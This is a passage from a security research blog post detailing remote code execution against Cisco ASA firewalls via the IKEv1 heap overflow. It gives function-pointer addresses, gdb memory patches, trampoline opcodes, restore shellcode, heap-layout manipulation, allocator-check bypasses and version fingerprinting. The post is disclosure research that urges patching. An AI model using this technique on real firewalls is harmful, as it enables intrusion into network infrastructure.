0xadc176c0: 0x00 0x02 0x80 0x03 0x00 0x01 0x80 0x04
0xadc176c8: 0x00 0x02 0x80 0x0b 0x00 0x01 0x00 0x0c
0xadc176d0: 0x00 0x04 0x00 0x00 0x70 0x80 0x00 0x00
0xadc176d8: 0x0f 0xb0 0x90 0x90 0x90 0x90 0x90 0x90
0xadc176e0: 0x90 0x90 0x90 0x90 0xcc 0xcc 0xcc 0xcc
0xadc176e8: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc176f0: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc176f8: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc17700: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc

The last thing we need to check is where and when IKEMM_BuildMainModeMsg2 gets executed, allowing us to find out a corresponding function pointer to overwrite. There is indeed a global pointer (IKEMM_BuildMainModeMsg2_ptr) that references it, but it is in a read-only (.rodata) part of the memory so we can't overwrite it directly.

.rodata:09E7F240 IKEMM_BuildMainModeMsg2_ptr dd offset IKEMM_BuildMainModeMsg2

However, there is a pointer to the IKEMM_BuildMainModeMsg2_ptr function pointer (IKEMM_BuildMainModeMsg2) stored in a global table (IKEmmStateTable) that is in a writable part of memory.

.data:0A46B680 IKEmmStateTable dd offset off_9E7F000 
.data:0A46B684 dd offset off_9E7F020
...
.data:0A46C330 dd offset IKEMM_BuildMainModeMsg2_ptr
...

There is a pointer (IKEmmTableInfo_ptr) to this global table (IKEmmStateTable).

.data:0A474F6C IKEmmTableInfo_ptr dd offset IKEmmStateTable

Looking at the backtrace when IKEMM_BuildMainModeMsg2() is called, we realised it is called by the instructions below. Basically, it accesses the pointer IKEmmTableInfo_ptr, finds the global table IKEmmStateTable. Then it indexes into IKEmmStateTable corresponding to the index for the IKEMM_BuildMainModeMsg2_ptr function pointer and finally de-references it to call the actual IKEMM_BuildMainModeMsg2 function.

.text:09BA5E60 FSM_SMDriver proc near
...
.text:09BA5FE9 loc_9BA5FE9:
.text:09BA5FE9 movzx edx, word ptr [esi+4]
.text:09BA5FED imul edx, [ebp+var_20]
.text:09BA5FF1 movzx eax, [ebp+var_38]
.text:09BA5FF5 mov ebx, [ebp+IKEmmTableInfo_ptr] ; IKEmmTableInfo_ptr
.text:09BA5FF8 add eax, edx ; e.g. eax = 8
.text:09BA5FFA mov edx, [ebx] ; edx = IKEmmStateTable
.text:09BA5FFC mov edx, [edx+eax*4]
.text:09BA5FFF  mov [ebp+func_ptr], edx ; e.g. IKEMM_BuildMainModeMsg2_ptr
.text:09BA6002 mov eax, [edx]
.text:09BA6004 test eax, eax
.text:09BA6006 jz short loc_9BA6065
.text:09BA6008 mov edx, [ebp+arg_14]
.text:09BA600B mov ecx, [ebp+arg_10]
.text:09BA600E mov ebx, [ebp+arg_C]
.text:09BA6011 mov [esp+8], edx
.text:09BA6015 mov [esp+4], ecx
.text:09BA6019 mov [esp], ebx
.text:09BA601C call eax ; IKEEnqueExtAction(), IKEMM_BuildMainModeMsg2(), etc.
.text:09BA601E mov edx, [ebp+func_ptr]
.text:09BA6021 mov edi, eax ; return value

In other words, if we replace any writable pointer in the chain, we can modify the control flow. It is easiest to modify the IKEMM_BuildMainModeMsg2_ptr entry in the table.

Jumping onto our packet

From this moment, we know we can get RCE on systems without ASLR and NX (which is plenty, as noted in our firmware-related blog post) since we have everything we need:

  • We can use a mirror write to overwrite IKEMM_BuildMainModeMsg2_ptr to point to some controlled code.
  • This controlled code needs to be a trampoline that redirects execution to our packet data.
  • We ostensibly trigger as many mirror writes as we need to build a trampoline somewhere in memory.
  • The trampoline should de-reference edx, add 0x6a to the value and jump to it.

After a few failed tests using three mirror writes, we ended up using four mirror writes. The layout requires one free chunk followed by three adjacent allocated chunks that will be overlaid upon re-allocation of the encompassing free chunk to facilitate corruption.

For debugging we don't really need to trigger the exploit each time. Instead we can directly patch memory in gdb to simulate that we patched the function pointer and installed our trampoline, as if we used the mirror writes. Then we can send an SA init packet with shellcode and check that we get our shellcode executed.

The four patches are the following:

(gdb) set *(int*)0x0a46c330 = 0xc2831200  (1)
(gdb) set *(int*)0xc2831200 = 0xc2831204 (2)
(gdb) set *(int*)0xc2831204 = 0xc283128b (3)
(gdb) set *(int*)0xc2831208 = 0xc2e2ff6a (4)

Patch (1) is used to patch the pointer to function pointer:

.data:0A46C330  dd offset IKEMM_BuildMainModeMsg2_ptr

into:

.data:0A46C330  dd offset IKEMM_BuildMainModeMsg2_fake_ptr

We make it point to a part of memory which is RWX because ‘read/write’ is needed while unlinking and ‘execute’ is required for storing our trampoline that we want to execute. We choose addresses within 0xc2000000-0xc2ffffff and confirm with our debug shell that it has RWX. It is unused (filled with 0x0 as we can check with gdb):

# ps|grep lina
517 root /asa/bin/lina -p 512 -t -g -l
# cat /proc/517/maps
a6000000-a8724000 rwxs 00000000 00:0e 1740 /dev/udma0
a8800000-ab400000 rwxs 00000000 00:0b 0 /SYSV00000002 (deleted)
ab800000-abc00000 rwxs 03000000 00:0b 0 /SYSV00000002 (deleted)
ac400000-dbc00000 rwxs 03c00000 00:0b 0 /SYSV00000002 (deleted)

There is a chance that under very heavy memory load this memory could be in use for something, but generally it corresponds to what is part of the dlmalloc wilderness and is therefore generally safe to use.
Patch (2) is used to create a fake function pointer. We basically craft something similar to the following, but place it somewhere else in memory.

.rodata:09E7F240 IKEMM_BuildMainModeMsg2_ptr dd offset IKEMM_BuildMainModeMsg2

We effectively get the following:

.rwx:c2831200 IKEMM_BuildMainModeMsg2_fake_ptr  dd offset Trampoline_address

Now, we can build our trampoline at 0xc2831204. We use two writes as we need to write eight bytes. The following was used:

; edx is a pointer to our packet
#0: 8b 12 mov edx,DWORD PTR [edx] ; access our packet
#2: 83 c2 6a add edx,0x6a ; points to our shellcode within packet
#5: ff e2 jmp edx ; jump to it
#7: c2 .byte 0xc2

Restoring execution

Once our payload is running, we need to fix up what we did. First, we restore the overwritten pointer to function pointer so future SA initialization packets will function correctly.

// IKEmmStateTable[index] = IKEMM_BuildMainModeMsg2_ptr
mov ebx, 0x09E7F240 # IKEMM_BuildMainModeMsg2_ptr
mov eax, 0x0A46C330 # offset for IKEMM_BuildMainModeMsg2_ptr in IKEmmStateTable
mov [eax], ebx

We want to call the original function to make sure it does not crash.

mov eax, 0x086AE1B0    # IKEMM_BuildMainModeMsg2
jmp eax

After doing that, we realise that IKEMM_BuildMainModeMsg2 is called, returns, and then a crash occurs. Looking at the code after the function returns, we see that the func_ptr is reused:

.text:09BA601C            call   eax ; IKEEnqueExtAction(), IKEMM_BuildMainModeMsg2(), etc.
.text:09BA601E mov edx, [ebp+func_ptr]
.text:09BA6021 mov edi, eax ; return value

It corresponds to our IKEMM_BuildMainModeMsg2_ptr that we had corrupted so the value is not valid.

.text:09BA5FFF            mov    [ebp+func_ptr], edx ; e.g. IKEMM_BuildMainModeMsg2_ptr

We can simply fix it as well before calling IKEMM_BuildMainModeMsg2:

// *(ebp+func_ptr) = IKEMM_BuildMainModeMsg2_ptr
mov eax, ebp
sub eax, 0x24
mov ebx, 0x09E7F240 # IKEMM_BuildMainModeMsg2_ptr
mov [eax], ebx

Restoring the heap layout

The next step is to make sure to fix the heap chunks that were corrupted. We detail the important bits here. Let’s summarise the different steps of our exploit to understand what needs to be fixed.

When the reassembled buffer is allocated, we have the following layout:

0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53   //reassembled packet
0xacb96bd8 F sz:0x00030 fl:-P free_pc:0x00000000,-
0xacb96c08 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96e08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

After the initial memory corruption we have:

0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53   //reassembled packet
0xacb96bd8 F sz:0x00490 fl:-P free_pc:0x00000000,-                     //chunk with corrupted size
0xacb97068 M sz:0x001a0 fl:C- alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

After the reassembled packet is freed, we have (due to 0x1d0-byte chunk coalescing with the 0x490-byte):

(gdb) dlchunk 0xacb96a08-0x200 -c 4
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 F sz:0x00660 fl:-P free_pc:0x0865878c,ikev1_parse_packet+0x33c //encompasses 0xacb96c08..
0xacb97068 M sz:0x001a0 fl:C- alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

Next we reallocated the 0x660-byte chunk to corrupt the mempool header links for the three adjacent allocated chunks and crafted a fake 0x30-byte free chunk before that.

However, the layout can be interpreted from two points of view. The first one is from the reallocated 0x660 chunk.

(gdb) dlchunk 0xacb96a08 -c 5
0xacb96a08 M sz:0x00660 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97068 M sz:0x001a0 fl:CP alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

The second one is from the chunks after 0xacb96c08 where we see a 0x30 free chunk before.

(gdb) dlchunk 0xacb96bd8 -c 4
0xacb96bd8 F sz:0x00030 fl:-P free_pc:0x00000000,-
0xacb96c08 M sz:0x00200 fl:C- alloc_pc:0x00004443,-
0xacb96e08 M sz:0x00200 fl:CP alloc_pc:0x00004443,-
0xacb97008 M sz:0x00200 fl:CP alloc_pc:0x00004443,-

After all, the 0x200-byte chunks are free, the mirror writes happen and our shellcode executes. We continue execution and no crash happens. Indeed, it is due to Checkheaps being disabled so it does not see the corrupted heap chunks that we haven’t fixed yet.

This allows us to understand how to fix the heap. As can be seen below, all previously adjacent chunks are still allocated because the IKE sessions for these chunks are left open. That said, the chunk after the 0x660-byte chunk is not valid because the 0x660-byte chunk encompasses a very large adjacent chunk. If Checkheaps had been enabled, it would have detected this invalid chunk.

(gdb) dlchunk 0xacb96008 -c 10
0xacb96008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 M sz:0x00660 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
[!] Chunk at address 0xacb97068 likely invalid or corrupt
0xacb97068 F sz:0x00000 fl:--
<<< end of heap segment >>>

The very large chunk starts at 0xacb96bd8 and has been reallocated in-between in the below case. This corresponds to our previously 0x30-byte free chunk that got coalesced to the three following allocated chunks (0x5f8+0x38=0x630=0x30+0x200+0x200+0x200).

(gdb) dlchunk 0xacb96bd8 -c 10
0xacb96bd8 M sz:0x005f8 fl:CP alloc_pc:0x086a12ea,isadb_create_entry+0x4a
0xacb971d0 M sz:0x00038 fl:CP alloc_pc:0x086c794e,oakley_atts_to_sa+0x51e
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97a08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97c08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97e08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb98008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

The only thing we need to do is to fix the chunk at 0xacb96a08. More precisely we need to fix its dlmalloc-2.8.x head and mempool header mh_len fields to reflect a size that aligns everything ok.

(gdb) set *(int*)(0xacb96a08+4) = 0x000001d3
(gdb) set *(int*)(0xacb96a08+0xC) = 0x000001a4

We can check that it now aligns:

(gdb) dlchunk 0xacb96a08-0x200 -c 10
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086887bd,-
0xacb96bd8 M sz:0x005f8 fl:CP alloc_pc:0x086a12ea,-
0xacb971d0 M sz:0x00038 fl:CP alloc_pc:0x086c794e,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97a08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97c08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-

In our experiment, we clear all sessions to free all packets.

asa(config)# clear crypto ikev1 sa

We see all our buffers were freed (between 0xacb96008 and 0xacb98408) and it did not trigger any crash.

(gdb) dlchunk 0xacb96808-0x800 -c 10
0xacb96008 F sz:0x02400 fl:-P free_pc:0x0868161d,-
0xacb98408 M sz:0x01030 fl:C- alloc_pc:0x09306bc3,-
0xacb99438 M sz:0x00830 fl:CP alloc_pc:0x09306b5e,-
0xacb99c68 M sz:0x00230 fl:CP alloc_pc:0x091658b9,-
0xacb99e98 M sz:0x00118 fl:CP alloc_pc:0x0825e016,-
0xacb99fb0 F sz:0x00028 fl:-P free_pc:0xf3eecdef,-
0xacb99fd8 M sz:0x00080 fl:C- alloc_pc:0x090f3ea0,-
0xacb9a058 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-
0xacb9e088 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-
0xacba20b8 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-

We don't get any crash after re-enabling Checkheaps in gdb. Now we can add a reverse CLI to access the Cisco shell with all privileges.

What has been described so far can be extended to disable Checkheaps on the fly or can be adjusted to avoid Checkheaps detection, however for the sake of simplifying the explanation we don’t go into those details.

Interesting tricks

We detail a few interesting tricks we used when developing the IKEv1 exploit.

Avoiding ok_address() during coalescence in dlmalloc-2.8.x

This is something Exodus had to use for the IKEv2 exploit but that hadn't been explicitly explained.

We assume a layout like the one shown below. G is a free chunk and each A is an allocated chunk we control.

| big buff overlapping A1-A3 | fake G | A1 | A2 | A3 |

When we free A1, it backward coalesces into G. This will result in two unlinks: one using mh_fd_link and mh_bk_link, and the second will use fd/bk because of A1 backwards coalescing into fake G (which is part of big buff).

When unlinking G for the backward coalescence it will end up calling unlink_small_chunk() (e.g. for a 0x30 G chunk), which we previously detailed. The important part here is that because dlmalloc-2.8.x, as compiled on Cisco devices, uses the RTCHECK() asserts, it will end up running:

/* Unlink a chunk from a smallbin */
#define unlink_small_chunk(M, P, S) {
mchunkptr F = P->fd;
mchunkptr B = P->bk;
//...
else if (RTCHECK((F == smallbin_at(M,I) || ok_address(M, F)) &&
(B == smallbin_at(M,I) || ok_address(M, B)))) {

We have to safely avoid ok_address(), which is:

#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)

In this case mstate->least_addr points to the base, which on 32-bit without ASLR is typically 0xa8400008 or 0xa8800008, so we can't, for instance, mirror write into destinations located in lina's .data section. This is important because for the exploits we end up having to write at least one pointer into .data, which you'd normally want as the last write because it is what inevitably redirects code execution. However, we just need to do it in one of the unlinks that operates on the mempool headers instead, since they don't use the same checks. We can do it in the last mempool header unlink for A1 before the coalescence with the previous G chunk.

Tricking unlink_large_chunk() when faking a large overlap chunk

When we trigger exploitation on IKEv1, we end up corrupting an adjacent G free chunk (same way Exodus Intel did it) in order to overlay a bunch of other in-use chunks we want to corrupt. In order to do this we corrupt a 0x30-byte small chunk into a 0x660-byte large chunk. This causes one notable problem in so far as the free chunk header for a small chunk is different than a large chunk header (used for chunks above 0x100 bytes).
Note that this section briefly duplicates some information we presented in our dlmalloc blog post, so those who read it can skip over the rest of this section if they like.

A large chunk looks like this:

struct malloc_tree_chunk {
/* The first four fields must be compatible with malloc_chunk */
size_t prev_foot;
size_t head;
struct malloc_tree_chunk* fd;
struct malloc_tree_chunk* bk;

struct malloc_tree_chunk* child[2];
struct malloc_tree_chunk* parent;
bindex_t index;
};

Whereas a small chunk looks like this:

struct malloc_chunk {
size_t prev_foot; /* Size of previous chunk (if free). */
size_t head; /* Size and inuse bits. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
};

The problem here is that when unlinking this modified G chunk with a larger size, the heap will now call unlink_large_chunk() during coalescence, instead of unlink_small_chunk(), which ends up acting on what it thinks is a malloc_tree_chunk.

The important thing though is that in the layout below:

| Reassembly | G |

We explicitly created the 0x30-byte free chunk G when we did the feng shui. This is because it is part of a hole re-used for the reassembly, so we control the contents of the free chunk. This means we can prime some of the data in it that will be used later when processed as the malloc_tree_chunk.

The main thing required is to set the parent to NULL. When unlink_large_chunk() is called it will do the following:

#define unlink_large_chunk(M, X) {
tchunkptr XP = X->parent;
tchunkptr R;
if (X->bk != X) {
tchunkptr F = X->fd;
R = X->bk;
if (RTCHECK(ok_address(M, F))) {
F->bk = R;
R->fd = F;
}
else {
CORRUPTION_ERROR_ACTION(M);
}
}
else {
[...]
}

Above, it will unlink the chunk from the typical double linked list. But next, as shown below, it tries to see if the parent is NULL (if (XP != 0) test). If not you can see it does a bunch of additional actions, including manipulating the child nodes. However, if parent is NULL then this whole portion of the unlink operation is skipped and we don't have to worry about it.

 if (XP != 0) {
tbinptr* H = treebin_at(M, X->index);
if (X == *H) {
if ((*H = R) == 0)
clear_treemap(M, X->index);
}
else if (RTCHECK(ok_address(M, XP))) {
if (XP->child[0] == X)
XP->child[0] = R;
else
XP->child[1] = R;
}
else
CORRUPTION_ERROR_ACTION(M);
if (R != 0) {
if (RTCHECK(ok_address(M, R))) {
tchunkptr C0, C1;
R->parent = XP;
if ((C0 = X->child[0]) != 0) {
if (RTCHECK(ok_address(M, C0))) {
R->child[0] = C0;
C0->parent = R;
}
else
CORRUPTION_ERROR_ACTION(M);
}
if ((C1 = X->child[1]) != 0) {
if (RTCHECK(ok_address(M, C1))) {
R->child[1] = C1;
C1->parent = R;
}
else
CORRUPTION_ERROR_ACTION(M);
}
}
else
CORRUPTION_ERROR_ACTION(M);
}
}
}

Porting to 64-bit

Still avoiding ok_address()

We discussed this hurdle for 32-bit already, but for 64-bit (asa924-smp-k8.bin) we have mstate->least_addr = 0x7fff99485000 which means we also can't use an address in a large portion of otherwise available RWX memory. For example the DMA mempool, mapped via /dev/udma0, becomes unusable for mirror writes, which would have been otherwise quite useful:

7fff90a00000-7fff99397000 rwxs 00000000 00:0f 2135     /dev/udma0

We chose instead to use the .bss section at the end of libcgroup.so to build our trampoline, since in our example above we relied on one free unlink.

7ffffe25d000-7ffffe8bb000 rwxp [.bss] /usr/lib64/libcgroup.so.1.0.34

Another approach is to only use mempool alloc linked list pointers for all mirror writes and not bothering to craft a fake small free chunk for the additional unlink. This would also have the advantage of working on newer 64-bit devices based on ptmalloc with safe unlinking.

Still tricking unlink_large_chunk()

When using the following layout:

malloc: 0x7fff99b6b140, realsz 0x01d0, reqsz 0x018c - reassembled packet
0x7fff99b6b140 M sz:0x001d0 fl:CP alloc_pc:0x00a06235,-
0x7fff99b6b310 F sz:0x00030 fl:-P free_pc:0x1bca11c0123,-
0x7fff99b6b340 M sz:0x00200 fl:C- alloc_pc:0x00a0cc50,-
0x7fff99b6b540 M sz:0x00200 fl:CP alloc_pc:0x00a0cc50,-
0x7fff99b6b740 M sz:0x00200 fl:CP alloc_pc:0x00a0cc50,-

We can notice the adjacent 0x30 free chunk finishes at 0x7fff99b6b340:

(gdb) x /20wx 0x7fff99b6b310
0x7fff99b6b310: 0xb04884c8 0x00007fff 0x000004a1 0x00000000
0x7fff99b6b320: 0xa0fe8170 0x00007fff 0x994850b0 0x00007fff
0x7fff99b6b330: 0xf3ee0123 0x00000000 0x00000000 0xf3eecdef
0x7fff99b6b340: 0x00000030 0x00000000 0x00000202 0x00000000
0x7fff99b6b350: 0xa11c0123 0x000001bc 0x00000000 0x00000000
struct malloc_chunk @ 0x7fff99b6b310 {
prev_foot = 0x7fffb04884c8
head = 0x30 (PINUSE)
fd = 0x7fffa0fe8170
bk = 0x7fff994850b0
struct mp_header @ 0x7fff99b6b330 {
mh_refcount = 0xf3ee0123
mh_unused = 0x0
mh_fd_link = 0xf3eecdef00000000 (unmapped)
mh_bk_link = 0x30 (unmapped)
allocator_pc = 0x202 (-)
free_pc = 0x1bca11c0123 (-)
[!] Chunk corrupt? Bad size

Once we have replaced its dlmalloc-2.8.x size (head) field, it becomes a malloc_tree_chunk due to it being bigger than 0x100. As you can see below, the parent field is pointing to the following 0x200 chunk's prev_foot field instead of the 0x30 free chunk's data that we controlled in 32-bit.

Note below that the 0x200-byte chunk prev_foot happens to be 0x30 in our case. On 32-bit we expressively allocate something in the 0x200-byte future hole with NULL bytes so, even if later it is freed, when we allocate the 0x1d0 reassembled packet into this hole, the following 0x30-byte chunk contains NULL bytes in it. This is done because when it inevitably interprets the malloc_tree_chunk->parent it is referenced from inside the 0x30-byte free chunks data.

(gdb) x /20wx 0x7fff99b6b310
0x7fff99b6b310: 0xb04884c8 0x00007fff 0x000004a1 0x00000000
0x7fff99b6b320: 0xa0fe8170 0x00007fff 0x994850b0 0x00007fff
0x7fff99b6b330: 0xf3ee0123 0x00000000 0x00000000 0xf3eecdef
0x7fff99b6b340: 0x00000030 0x00000000 0x00000202 0x00000000
0x7fff99b6b350: 0xa11c0123 0x000001bc 0x00000000 0x00000000
(gdb) dlchunk $rdi -v -x
struct malloc_tree_chunk @ 0x7fff99b6b310 {
prev_foot = 0x7fffb04884c8
head = 0x4a0 (PINUSE)
fd = 0x7fffa0fe8170
bk = 0x7fff994850b0
left = 0xf3ee0123
right = 0xf3eecdef00000000
parent = 0x30
bindex = 0x202
struct mp_header @ 0x7fff99b6b350 {
allocator_pc = 0x1bca11c0123 (-)
free_pc = 0x0 (-)
0x450 bytes of chunk data:
0x7fff99b6b360: 0x99b6af50 0x00007fff 0x99b6b550 0x00007fff
0x7fff99b6b370: 0x00a0cc50 0x00000000 0x0000000d 0x12345678
0x7fff99b6b380: 0x45304136 0x4a395530 0xa2aec837 0x49f89c60
0x7fff99b6b390: 0x08021084 0x01000000 0xbc010000 0xa0010000
0x7fff99b6b3a0: 0x00011200 0x43434343 0x43434343 0x43434343
0x7fff99b6b3b0: 0x43434343 0x43434343 0x43434343 0x43434343
...
0x7fff99b6b530: 0x43434343 0x43434343 0x43434343 0xa11ccdef

A workaround for this in 64-bit is to allocate a 0x1c0 chunk (instead of a 0x1d0) so it leaves a 0x40 free chunk that will overlap with the parent field to ensure it is NULL.

Version detection

Our exploit relies on having the exact ASA firmware version in order to know the addresses targeted by our mirror writes.

To figure this out, where possible, we use one of the multiple publicly reported WebVPN/AnyConnect version leaks. We realised that most devices we see that are vulnerable to the IKE heap overflow bug are also vulnerable to the ASA version leaks and often have these services running.

Conclusions

This research highlights some of the quirks with exploiting this bug on IKEv1 in comparison to IKEv2. It also highlights the need to patch all Cisco ASA firewalls and to avoid rolling back to old protocols, such as IKEv1, to mitigate against the vulnerability. We have observed a lot of clients ‘mitigating’ the risk of this bug simply by shutting off IKEv2, which clearly is not effective.
We would appreciate any feedback or corrections. If you would like to contact us we can be reached by email or twitter: aaron(dot)adams(at)nccgroup(dot)trust / @fidgetingbits and cedric(dot)halbronn(at)nccgroup(dot)trust / @saidelike.

Read all posts in the Cisco ASA series

References

[1] https://blog.exodusintel.com/2016/02/10/firewall-hacking/

[2] https://github.com/nccgroup/libdlmalloc

[3] https://github.com/nccgroup/libmempool

[4] https://github.com/bootleg/ret-sync/

[5] https://www.cisco.com/c/en/us/td/docs/security/asa/asa90/configuration/guide/asa_90_cli_config/vpn_ike.html

Published date:  10 November 2017

Written by:  Aaron Adams and Cedric Halbronn

Filter By Service

Filter By Date